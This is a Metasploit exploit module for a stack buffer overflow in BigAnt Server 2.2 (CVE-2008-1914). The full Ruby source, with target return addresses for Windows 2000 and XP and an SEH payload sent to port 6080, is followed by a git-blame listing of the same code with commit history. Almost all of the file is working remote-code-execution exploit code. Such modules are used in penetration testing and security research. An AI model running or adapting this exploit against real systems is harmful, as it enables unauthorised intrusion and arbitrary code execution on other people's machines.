modules/exploits/windows/misc/bigant_server.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BigAnt Server 2.2 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in BigAnt Server 2.2.
        By sending a specially crafted packet, an attacker may be
        able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-1914' ],
          [ 'OSVDB', '44454' ],
          [ 'BID', '28795' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
      'Payload'        =>
        {
          'Space'    => 750,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'  =>  'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro All English',   { 'Ret' => 0x75022ac4 } ],
          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2008-04-15'))

    register_options([Opt::RPORT(6080)])
  end

  def exploit
    connect

    sploit =  "GET " + rand_text_alpha_upper(950) + generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(1024 - payload.encoded.length)

    print_status("Trying target #{target.name}...")
    sock.put(sploit + "\n\n")

    handler
    disconnect
  end
end
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'BigAnt Server 2.2 Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in BigAnt Server 2.2.`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`By sending a specially crafted packet, an attacker may be`
			`able to execute arbitrary code.`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`},`
			`'Author' => [ 'MC' ],`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`[ 'CVE', '2008-1914' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '44454' ],`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`[ 'BID', '28795' ],`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
Keep default behavior for modules forcing Msf::Encoder::Type::AlphanumUpper 2015-02-08 18:29:25 -06:00			`'AllowWin32SEH' => true`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`},`
			`'Payload' =>`
			`{`
			`'Space' => 750,`
			`'BadChars' => "\x00\x20\x0a\x0d",`
			`'StackAdjustment' => -3500,`
			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
			`'DisableNops' => 'True',`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ],`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2008-04-15'))`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(6080)])`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`end`

			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`sploit = "GET " + rand_text_alpha_upper(950) + generate_seh_payload(target.ret)`
			`sploit << rand_text_alpha_upper(1024 - payload.encoded.length)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
			`print_status("Trying target #{target.name}...")`
added exploit module bigant_server.rb 2008-05-15 00:58:44 +00:00			`sock.put(sploit + "\n\n")`

			`handler`
			`disconnect`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`